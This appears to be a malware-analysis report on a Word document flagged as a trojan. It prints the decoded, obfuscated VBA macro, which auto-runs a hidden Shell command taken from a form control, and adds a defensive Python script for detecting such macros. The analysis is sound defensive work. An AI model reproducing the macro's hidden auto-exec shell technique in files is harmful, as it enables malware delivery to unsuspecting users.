Verdict: MALICIOUS
Risk score: 252

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1059 Command and Scripting Interpreter
The sample contains a VBA module whose autoopen() entry point calls a single function (zHTzSqlk) that ends in a Shell() invocation: `Interaction.Shell(kmUtjEjj, kYZQjkENiKi)`, where kYZQjkENiKi is declared `Const kYZQjkENiKi = 0` (vbHide), so the child process is started with no visible window. The command string kmUtjEjj is not a literal in the macro: it is assembled at run time from the contents of a form control (BuPVNTXjK.TextBox1, declared by the VB_Control attribute) concatenated with variables that are never assigned anywhere in the module (and so are Empty), which makes the command effectively the control's text. The exact command line therefore cannot be recovered from the macro source alone; it has to be read out of the document's form data. Everything else in the module is padding: twenty-one Select Case blocks on undefined variables, with CByte/ChrW/Log calls whose errors are swallowed by On Error Resume Next, and the Shell call itself is buried inside an Array(...) argument list with the `Interaction` qualifier separated from `.Shell` by eight line-continuation underscores, a layout that defeats naive line-by-line pattern matching. The SC_STR_CMD heuristic (a cmd.exe invocation with an execution flag found in the sample's strings) is consistent with the control holding a cmd.exe command line, and together with OLE_VBA_SHELL points to a downloader or second-stage launcher, although no download URL is visible in the source: the only extracted URL is an OOXML schema namespace. ClamAV independently flags the document as Doc.Trojan.Agent-6784394-0; the decoded macro module on its own is not flagged.
Heuristics (9)

- ClamAV: Doc.Trojan.Agent-6784394-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Agent-6784394-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `_ .Shell(kmUtjEjj, kYZQjkENiKi), SptOpBQOE) Set wjiHXrqTHUClBvdlLkPbjYh = SWcNEpwjFOuUvXmQwqGQr`. The full statement is `Interaction.Shell(...)` with the qualifier split from the member by a run of line-continuation underscores (see the preview script); the matched text shows only the tail of that statement plus the statement that follows it.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. For this sample it corroborates the source-level findings rather than standing in for missing source.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() zHTzSqlk`. The VB_Control attribute on the same line declares the TextBox1 form control whose contents the macro later reads into the Shell command string.
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD).
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. The "no modern VBA project was recovered" clause of this generic description does not hold for this sample, where olevba did decode a VBA module (macros.bas, below); the AutoOpen marker here is the same one OLE_VBA_AUTOOPEN reports.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace carried by ordinary Office files, not a payload or command-and-control location.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10524 bytes |

SHA-256: 3563c3585c84bc0786db20c1c1e14e85a5d2c07e60094a8ae602285f295ef248

Detection (ClamAV): No threats found. The Doc.Trojan.Agent-6784394-0 hit above is on the document container, not on the decoded module.

Obfuscation or payload: likely. 282 of 329 identifiers look randomly generated (e.g. 'hTpKfrGSpSwwGaCiuFcLjLhm'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "BuPVNTXjK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
zHTzSqlk
End Sub
Attribute VB_Name = "ROwOMfIHsBUr"
Function zHTzSqlk()
On Error Resume Next
Set UkhcRBShJTdvFF = wWOAObtwmwujHssjYFC
Select Case VowfaGLHAPnEFS
Case 93730478
ERVZblviXVLpRmFp = EDIaiaHQlzWKpa
ifbGkdajtRIEvWqOKzBBOF = 252861062
rNJpnYThuWKlKwFZiT = JaVMtvjLNoZaYtFPW
Case 132622984
wUzbKYLEDMsbWuqdvVBPt = CByte(MGsUwlsFiiFuXu)
zLnirjzUMDfiPKuV = ChrW(qrIripbZLwdKVcW)
RvJNjCXMlfRRDcuoNADfmURW = Log(JfhVKqaImwOkHYoU)
End Select
Set GDlXYoIfEpsStPZqHh = iXlbPKJakFanhziOwkHi
Select Case vwaVzijDXhbwHazUb
Case 147542705
POXZdBKTKBcFACOj = LGRcaXNYzraYltVOuPC
YwTnOZBvbbtsrYJVEj = 269027016
KBdKjuYIHrFnLLAOmiOBVSw = zhjNjzJLaLMWSIDUAtn
Case 240102634
GhjXujaVnWsFFNCOLY = CByte(htMzwdvdatAbiLC)
AApoPiqmpURMvBFpVfCbuh = ChrW(uzFzbnuNtDXBOVjszDZKi)
iiZoLGzJawSSvpKi = Log(zvGXJYzrUlmDYUWCi)
End Select
Set cvMbzVAkjcUaPiASGv = WzrzjWtJGtbZwlZ
Select Case jizrsrIVhImIkLpuRVFW
Case 246413159
jEDMurHDWpqFQnGDNiqWQYjl = uDhHdfCrlwvofwQNimz
fuCnOIafPiHVRoAna = 312156019
JnOfoLOhiaIlmlTtzBttUEW = CrZWrwdnjsoiQONbzas
Case 37250061
wVjwuAmjCYFQmdz = CByte(splwUCtzocloRttLRUGVqX)
wrGhUiNilPpGlHIlublKSOzP = ChrW(itzRWbvVspFOVZO)
wzZcmIEIjLuEMihtrYp = Log(NMOnulsSCXZBWkUPYmVVpr)
End Select
Set OVARdAkzFBSiEiNjBFEXk = sKfTjPozkZLJMTqrnivHBb
Select Case hljBSAhsGwXcqmKRVIFQsSuR
Case 302104528
KSacdpRNzhzNWzCjFMpqzE = MZwvKEOqRHcqPSdTiKcp
RImGOLNicDqFoNDitHJi = 279185506
FtImObtGfXPAvRMpvsBIp = mkaEapoDTGmjDs
Case 325204477
wmoWXSqoSmSELQhhsAH = CByte(LKAERcDINLOUrUwPTTh)
tmmoXkrDZErCkYQmlk = ChrW(vPhbGXzMrUSOZT)
iZYMhhkAjIULjSDJiiOlDL = Log(fQZXAiHqSiwtqOYD)
End Select
Set aLdkDOzpKCiEwOBOOc = MQkjAqpMzDzdYGdV
Select Case zbmGMNdvJLYAZrcUwMCpi
Case 195777590
NCBlMZKwVtQRnqDADHlqiQL = LVJZtafGThYDKcQVwND
IapduMzhtmPwqdZ = 281600233
kEuNKzFRAqarPrRNE = ljfihazMjScNjCZFO
Case 58772495
uwdjMuWZqivwjmO = CByte(KkGXUPwQnpmJYRJdIEKRIw)
jLBGhlTsaSNPVHloiA = ChrW(vWIMBZURqiczjNQW)
TJQiTwLrKBoVWQfR = Log(AwbwAhNUdNwUhBElaUVjhcaw)
End Select
Set iaznfNTuILCIfA = NKBzcITRjolSiaImlnrJGwc
Select Case jYJiZszztwzqoorsK
Case 63593468
zuulTAYQUnqlOhlQD = oroomYjbRzzwzwwjdVmnpiAb
LDNkIDXntVRdKIVBsibT = 156357874
rpiDPiQIKrNJaVWqIuZIGd = CTNQlzvZHHXLXCFntXkL
Case 172625863
AhzfCZjtPhOKfkCNf = CByte(OSFCDKwoDHjlWREn)
jRFvWsOspwNWVljrY = ChrW(HJwdojNWZNdKwFsRWwZQsZrJ)
NlRiVAtzVwdTCcYh = Log(TBOiAHdDPjSIEi)
End Select
Set vPRZMdduhNSIIww = XKvEThTXwipAQQp
Select Case YZKBKPDkhkFnLdDTsWuN
Case 20572211
mOvtcinciQXmjjlu = IHKWibfMTbVItWbcOmwFQmVz
GoPYuThzYlGsnEm = 105645282
JGSTktwKUzpphVlNRcnP = ZHoLVkUjaiJpkcOfmWuTNZ
Case 146867017
IqPUfWbzAskzdHOJbbuPjzw = CByte(WifFswazlwDfUADDGJpssPB)
IlrmiHLItWwzrWGDRkOh = ChrW(jobXrIWJEAHhBzH)
oUdlulzBFLkClaH = Log(TZZzQOnwowpWqQ)
End Select
Const kYZQjkENiKi = 0
Set NBtjXlrjwOXwLYTlzXozPiK = WljjKhfMAtitRAqmi
Select Case fvlkNlfRpZzlbfraKmFIYQiL
Case 317045882
qZTwjBTSDOhlXvDts = MORCCrpDhWXOMZo
vGzrszSJbctYPJEiYbwhAnXc = 57689542
UwuoCHzbAwwBNPvIbZwR = YRtqkbGvHjViQdWOmalboJ
Case 50407327
XOjmrMzdrnwiBwRjrfsNa = CByte(zlZuozMpAOKKSWrTE)
mrqchrMoJFkIRuHERzNzXwRB = ChrW(hUrfuoXawbjcVEiizpGFrz)
COFtGGYoaopzWUIOQ = Log(hVSYcwtiPXIKwvkE)
End Select
Set ElIHKjjvodYHtvmpsh = CUvwfRPwtLIpTw
Select Case oIGLVKsaHkYYVtdwbUfizIo
Case 192900525
vjnjjnEIwGdihLqJunLGst = PNhUoUvjTdVaaE
bwUQXnAPtJoUFUdXzCjYVzT = 105974477
CaJFLkQFCMPlcVPOznKzzq = qGXYtjVbdEcUMrKh
Case 162252349
PCHNlVjRJXMIQoMOSzo = CByte(WYhllhABDXnFmbjn)
cUCscWzPUonIzY = ChrW(tMBqVWcEVfOmkGWp)
YKpilUuCjVRtMsF = Log(cLaZtShAQhMOjNIwwijmijIr)
End Select
Set IzTJSRjJQsSscqLPdcDVHCW = nIIfWmtRBLwjNWOnpOLILE
Select Case MjpEMrhnGdhWKJAmizBrRriC
Case 47760718
QfsqOaiKvzhhjaUYs = fzEdpbhJKNjVBm
waCuQPGnzNBFwSaWszbXHJmp = 112520119
EPViazukhzRicoY = FQoWkrkqnVaPqonM
Case 192185062
KrSUnDKMkaFOXnw = CByte(EWBuYNfirEWitsLEBVdhukd)
LYGJlZznRvkRLiizLndih = ChrW(SrOAMCKQATtQizGWtRGj)
wIutSmjVGHvDfGPu = Log(MvdAuQYuziqpuLbzSUiUH)
End Select
Set zGLXUViwoqhIohUldnCtUnW = GJoREYWRwTzJTJNzMZLCR
Select Case khnGzuzTYLkbRKjMrPUP
Case 65918984
jKSTZDhucTSbZHiwYc = iulZrsDTzhvhBVOzcn
UuldjQJqlYhtqrvfbwla = 183474857
jiNjlQFKKCKsHZtQCI = BRuRoFqFpnwqNEwKDQCis
Case 239804991
NfiwjWlKwcraEpQYbvL = CByte(XMLzoJOpAziqRrjmG)
GjEdCOVdtVmrbih = ChrW(DBTkJaHwJwwBINIiSU)
bMuJzcKQtDIYvJwofSVzjb = Log(TFPUUjNIZGtFIIs)
End Select
Set IihaWPAQKIjKXdwwsjRtzovz = ZvVonPEMtKaDzzznb
Select Case VwfzhtPDXHDBUij
Case 65349029
UicXsczdTYvsjRFWhaAlaNcY = rwIrprTpCfIzicUhVOUUL
pwfmHiYWGCDoAfpldjbChm = 323518816
zzjEEzHDYEGKMDjkRf = FvubosjkotIGCAInJCU
Case 120546461
vAQwYiZawqlCOrb = CByte(WsLUOSKPwEJDPZ)
zNQKvifPNKKrCXEoJjjnK = ChrW(ztdpAwUVVKWInoz)
jarcwKDaHrtPzXjmYpPXj = Log(djusozVukPrczJw)
End Select
Set VkKlqSbYMmADPlwUBZhzaG = sTvqVDbisjjiUCVoFwzKDqc
Select Case zhDSBHZQPpSSubGU
Case 242663629
HTjCcRflcBavrB = hsnAIjkKQSikDtipfaziIdu
mnQfXpTwQbMiSTc = 148661498
JTjzjcswLuVrTiEwhO = QFnazjUbjvXMwdLzKL
Case 54257363
LYjLvwGzsIkkFGG = CByte(VtkRMALCniXOHjumZ)
KsYbiBZXjXLnGrX = ChrW(dQaqsLMiXMaspJOzKwwOsuO)
rpQnrAbjrNGdMiQwfuDSa = Log(hZINcKvJBiBrzDuZmXluA)
End Select
Set wowNmGPqFQqzIaKoPiQiG = HLBiliHHDowQWPrSYoEPHV
Select Case cVrVKqRnvaGjnLIVliwNBB
Case 286756313
vzwJbZrimVZItJ = RlBApQiDGQTTjJHpadnaNtHL
jXuSmzbbmjbzABnMtq = 296558625
GKZfjwfGjjYdpiG = olURsrucfpacANUCODPZwOl
Case 260045438
VsDIzJWvuYHWbPPPwz = CByte(YCFWOVPmOjuZAjzXzrUifDj)
pNjnoAJCPvORPWo = ChrW(iXHOAwHqirQYcRKUWzjBpc)
OWrJERjHcChzIwRFqGqJwkla = Log(ktvQpnzGZssIoCYzknVvRCYE)
End Select
kmUtjEjj = BuPVNTXjK.TextBox1 + LwWJAEa + JOsBXCrM + IpkfujR + MORiNc + ofmwN + kwcjj + wSFAnXt + iooAI + jXnopJ + fjcvzG
Set ZCfPnFPMBiZZYp = dvZIOoTQBBTnWzQ
Select Case vzwhjbtMzKYkmPIYaVkBtn
Case 293445930
FmiNURtMlrdcZIZCC = KEQjdltvNAPOuIEj
twjsfQMwvmjwSvhzfco = 337227528
IsTYEtwXwUXqhfFWUf = EkhwMwuEhPOjQkFlEMTaXQ
Case 182484867
RIIkPcdKzBvlatGcJoOHhoHG = CByte(uAKBEPoIijEoJoElDjP)
TKKFrRjBTRdBBIVbTJslGd = ChrW(NCnzAJWiFsRIjqEKmjmpRDC)
ATdSuqdiqSzCDRjszmYJkA = Log(lOzFFUoaJzBwhjDkOOjSQ)
End Select
Set OBQNWWjUYfnsOAqQoEiAzSBZ = iGGqPZMdjiljzBLESX
Select Case UiTqTIUpcqzvzqss
Case 104307085
iIGaPhRFjqCTvfvpFrKP = iujkminltFJvboOGtPlYOb
nJvSzKkAhzqvNWqdziTn = 245244655
XUrhjMbYrXHQwaqQnbIEbvl = AjDmmuuosumbaRbYZJISozZ
Case 99691543
jrsfjQbiwhzIolzcTXBoPp = CByte(zjfSnSECJoADCCIMdL)
ckbQkYLpUZYaWtVsvBwnQti = ChrW(ToiuaKLYdXMkYSuubcjdlN)
JhJMKiXbiGmwvpRPKOzz = Log(hkUcHEMnJBDFLZNQzAtGvdil)
End Select
Set ozpiqVQYFwDCvizbUzATNzrB = PnFzIzDUCWuNiDfQwmOphNqw
Select Case KGwimpInibhLazBzhs
Case 80050343
OpwVCQMdMRCzGi = qFqPhmazbwFWoMpAUivEUKcb
cfbNZkEvAKurdfRopU = 152596978
uXQWRhSKZcjcOtEGwmCNAaoC = IqziQipFibFOEvrStWXiRdj
Case 176330039
pDSJwUiObIqSjIwq = CByte(jSwstqKvGDRYdfHYUa)
XwiHWAdnAzNNYnvtRbS = ChrW(MHOpQQqwcjtLiWTaBKcrQDJv)
qskimpzBiPQhsqFKfKRFBfC = Log(UrGzajIzSzZXFQqtwK)
End Select
Set vKwiFBkdODpcVX = hzjwAmMzVhCpNmoCAQ
Select Case ZNKIVtjzTjmRZsjv
Case 43422683
koPjNdBCLWrZApMJwIWq = DTpsOiQdwiriXPbw
AjHThJGuizEQuaYPQhUaqw = 305666240
YOszrcZkMIIqjuWKjwflL = CESSHiHWzBmWuSRG
Case 20472582
YUDlRijVLJrsSJZ = CByte(MnjYVqdpJHDNADtc)
aNqJRmkmlXziGidwiGdZijh = ChrW(NcKiTUHQOzsviBuBwmjTjLC)
aQRwQDQqfzvobFSRPjQ = Log(qhNhLbdrANKCZlE)
End Select
KzKhB = Array(iFGZqT, Dzutis, kloaY, Interaction _
_
_
_
_
_
_
_
.Shell(kmUtjEjj, kYZQjkENiKi), SptOpBQOE)
Set wjiHXrqTHUClBvdlLkPbjYh = SWcNEpwjFOuUvXmQwqGQr
Select Case mbumTPZiKYzupBOdOSWS
Case 209821847
AJqnwwiqRRsojBTSViKWEW = BikCTbntZwzakvfQaE
GiCBRNJwwnHIhdopFN = 318932753
OdXSpkaiWpSjSkQn = hTpKfrGSpSwwGaCiuFcLjLhm
Case 176497827
HVXqzNBqXuHAjmQAASd = CByte(QPPFYiocPWmCjGjluzUjuQ)
IWtWpujKPJoJrG = ChrW(RSZZbBHEQdCfFBztr)
MGiiIzhfLXsvws = Log(chBKVoABRdsmPdJRPwJf)
End Select
Set iljmpQvfVVTcTkP = SzUiKrTNIkbJtYwH
Select Case pPbIzznITzTwRI
Case 257020255
SUqjdzmRViFolmwZMYdVnFV = hVquzOqcoPaEFaZrdJmSuwWh
umsiRFNzszIHsR = 47070500
dAVLrTmzmriSCDiwJsFczz = KNFMaRklrfiQzBVJaA
Case 300962522
ZbuwoQKzzMipfdLwmGLhBGm = CByte(XnkzojfbEFziSIYJHnmfAo)
UpWXToMqToHYBfMIQjCla = ChrW(djiiBaOUHmjCQHSMLnsP)
tLjWduiWwzCKoMpskmlb = Log(hUpzPEqDUPtKCjVuMXjkwIpj)
End Select
Set jawTvSltNZsnijWszU = ZDzrRAnLtDlDCNjwZptjb
Select Case wWFAWnWlTduQPSh
Case 225303353
SHGrpcWqaunzDEkHQEcm = iAoIkHIlzRPqIacUR
uiKwsjoPZJJzOEv = 106859659
HRjFUNEdcXGudImwviDFiH = TUizczDKvsmUChE
Case 169092663
GSPLiVvAWASWrKGAMP = CByte(mNcjZMKCrojQrIizPrulz)
wGwkoDijTqSTnHimqwXSEL = ChrW(kbNJKqJSilwPWjpYHULVtw)
VaVdAvOjjnTMJbtXpJY = Log(iosICBaQwtqtlDsjpMIWQE)
End Select
End Function
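The checks the report's heuristics describe (the AutoOpen entry point, the Shell() call, its window-style argument, the command string read from TextBox1, and the random-identifier ratio behind the "obfuscation: likely" verdict) can be reproduced on the decoded source with a few regular expressions, provided VBA line continuations are folded first: the sample splits `Interaction _ ... .Shell(` across nine lines, which is exactly what a per-line pattern match misses. The following is an added example written for this page, not code from the analyzer that produced the report or from oletools. It runs on a constructed, abridged excerpt modelled on the preview script above (SAMPLE_VBA, not the full module); all function names are this example's own, the window-style table is the standard vbAppWinStyle constants, and looks_random() is this example's approximation of the report's randomness check, not the analyzer's algorithm.

```python
"""Continuation-aware triage of a decoded VBA module. Added example for this page,
not code from the report's analyzer or from oletools. SAMPLE_VBA is a constructed,
abridged excerpt modelled on the preview script; looks_random() is this example's
own approximation of the report's 'identifiers look randomly generated' check."""
import re

SAMPLE_VBA = '''Attribute VB_Name = "BuPVNTXjK"
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
zHTzSqlk
End Sub
Function zHTzSqlk()
On Error Resume Next
Set UkhcRBShJTdvFF = wWOAObtwmwujHssjYFC
Select Case VowfaGLHAPnEFS
Case 93730478
ERVZblviXVLpRmFp = EDIaiaHQlzWKpa
Case 132622984
wUzbKYLEDMsbWuqdvVBPt = CByte(MGsUwlsFiiFuXu)
End Select
Const kYZQjkENiKi = 0
kmUtjEjj = BuPVNTXjK.TextBox1 + LwWJAEa + JOsBXCrM
KzKhB = Array(iFGZqT, Dzutis, kloaY, Interaction _
_
_
.Shell(kmUtjEjj, kYZQjkENiKi), SptOpBQOE)
End Function
'''

# Standard vbAppWinStyle values for the second Shell() argument; 0 (vbHide) = no window.
WINDOW_STYLES = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
                 3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}
AUTOEXEC_NAMES = {"autoopen", "auto_open", "autoexec", "autoclose", "auto_close", "autonew",
                  "autoexit", "document_open", "document_close", "document_new",
                  "workbook_open", "workbook_close"}
# VBA keywords / library names: not author-chosen identifiers, so excluded from the ratio.
KEYWORDS = {"attribute", "sub", "function", "end", "set", "select", "case", "const", "on",
            "error", "resume", "next", "array", "cbyte", "chrw", "log", "dim", "as", "if",
            "then", "else", "public", "private", "interaction", "shell", "vba"}


def join_continuations(src: str) -> str:
    """Fold ' _' line continuations (and bare '_' lines) into single statements. The sample
    spreads 'Interaction _ ... .Shell(' over nine lines, so per-line matching misses it."""
    joined = re.sub(r"(^|[ \t])_[ \t]*\r?\n[ \t]*", r"\1 ", src, flags=re.M)
    # 'obj .Member' is legal VBA after a continuation; normalise it to 'obj.Member'.
    return re.sub(r"[ \t]+\.(?=[A-Za-z_])", ".", joined)


def find_autoexec(src: str) -> list:
    """Procedures Office runs on open/close without a click (OLE_VBA_AUTOOPEN equivalent)."""
    pat = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I | re.M)
    return [m.group(1) for m in pat.finditer(src) if m.group(1).lower() in AUTOEXEC_NAMES]


def declared_controls(src: str) -> dict:
    """Form controls declared via Attribute VB_Control = "Name, x, y, Library, Class"."""
    pat = re.compile(r'^\s*Attribute\s+VB_Control\s*=\s*"(\w+),\s*\d+,\s*\d+,\s*(\w+),\s*(\w+)"',
                     re.I | re.M)
    return {m.group(1): f"{m.group(2)}.{m.group(3)}" for m in pat.finditer(src)}


def find_shell_calls(src: str) -> list:
    """Shell()/Interaction.Shell()/VBA.Shell() calls (OLE_VBA_SHELL equivalent). The window
    style is resolved through Const declarations; the command argument is traced to its
    assignment and to any form control it reads, since the command text is not in the source."""
    norm = join_continuations(src)
    consts = dict(re.findall(r"^\s*Const\s+(\w+)\s*=\s*(-?\d+)", norm, re.I | re.M))
    controls = declared_controls(norm)
    pat = re.compile(r"\b(?:(?:Interaction|VBA)\.)?Shell\s*\(\s*([^,()]+?)\s*(?:,\s*([^,()]+?))?\s*\)", re.I)
    calls = []
    for m in pat.finditer(norm):
        cmd_var, style = m.group(1), m.group(2)
        assign = re.search(r"^\s*%s\s*=\s*(.+)$" % re.escape(cmd_var), norm, re.I | re.M)
        cmd_expr = assign.group(1).strip() if assign else None
        used = [c for c in controls if cmd_expr and re.search(r"\.%s\b" % c, cmd_expr)]
        if style is None:
            win = "omitted"
        else:
            value = consts.get(style.strip(), style.strip())
            win = (WINDOW_STYLES.get(int(value), f"unknown({value})")
                   if value.lstrip("-").isdigit() else f"unresolved({style.strip()})")
        calls.append({"call": m.group(0), "command_expr": cmd_expr, "window_style": win,
                      "controls_used": used})
    return calls


def looks_random(name: str) -> bool:
    """Name-mangling guess: 6+ chars with repeated lower->UPPER flips or no vowels at all."""
    flips = sum(1 for a, b in zip(name, name[1:]) if a.islower() and b.isupper())
    return len(name) >= 6 and (flips >= 2 or not any(v in name.lower() for v in "aeiou"))


def identifier_stats(src: str) -> tuple:
    """(random-looking, total) distinct identifiers, ignoring strings, comments and keywords."""
    names = set()
    for line in src.splitlines():
        code = re.sub(r'"(?:[^"]|"")*"', '""', line).split("'", 1)[0]
        names.update(t for t in re.findall(r"\b[A-Za-z]\w*\b", code) if t.lower() not in KEYWORDS)
    return sum(looks_random(n) for n in names), len(names)


if __name__ == "__main__":
    rnd, total = identifier_stats(SAMPLE_VBA)
    print("auto-exec:", find_autoexec(SAMPLE_VBA))
    print("shell calls:", find_shell_calls(SAMPLE_VBA))
    print(f"random-looking identifiers: {rnd} of {total}")
```

On the excerpt this reports autoopen as the entry point, one call `Interaction.Shell(kmUtjEjj, kYZQjkENiKi)` with window style vbHide whose command expression reads the declared MSForms.TextBox control TextBox1, and 14 of 22 identifiers as random-looking. The same functions applied to the full macros.bas (fed in place of SAMPLE_VBA) find the same call; the command text itself still has to be pulled from the document's form storage, since it is not in the VBA stream.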